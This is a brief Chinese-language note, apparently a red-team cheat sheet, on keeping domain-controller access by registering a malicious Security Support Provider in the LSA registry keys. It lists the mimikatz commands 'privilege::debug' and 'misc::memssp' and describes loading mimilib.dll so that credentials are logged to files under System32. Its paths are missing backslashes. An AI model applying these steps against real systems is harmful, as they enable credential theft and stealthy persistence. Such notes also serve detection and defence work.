代码语言:javascript复制
Boot or Logon Autostart Execution: Authentication Package
HKLMSYSTEMCurrentControlSetControlLsa"Authentication Packages"=<target binary>
SSP维持域控权限
1.privilege::debug
misc::memssp
C:WindowsSystem32:mimilsa.log
重启后失效
2.注册表
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaSecurity Packages
加载mimilib.dll
重启后C:WindowsSystem32:kiwissp.log记录
lsass.exe作为windows系统进程,用于本都安全和登录策略,在系统启动时,ssp将被加载到lsass.exe进程
